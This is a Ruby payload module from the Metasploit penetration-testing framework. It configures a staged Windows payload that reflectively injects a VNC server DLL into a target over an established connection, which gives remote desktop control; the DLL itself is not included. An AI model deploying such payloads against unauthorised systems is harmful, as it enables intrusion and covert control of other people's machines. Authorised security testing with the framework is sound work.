modules/payloads/stages/windows/vncinject.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Copyright (c) 2008 Stephen Fewer of Harmony Security (www.harmonysecurity.com)
###
#
# Injects the VNC server DLL (via Reflective Dll Injection) and runs it over the established connection.
#
###
module MetasploitModule
include Msf::Payload::Windows::ReflectiveDllInject
include Msf::Sessions::VncInjectOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'VNC Server (Reflective Injection)',
'Description' => 'Inject a VNC Dll via a reflective loader (staged)',
'Author' => [ 'sf' ],
'Session' => Msf::Sessions::VncInject,
'Convention' => 'sockedi -http -https'))
end
def library_path
File.join(Msf::Config.data_directory, "vncdll.x86.dll")
end
end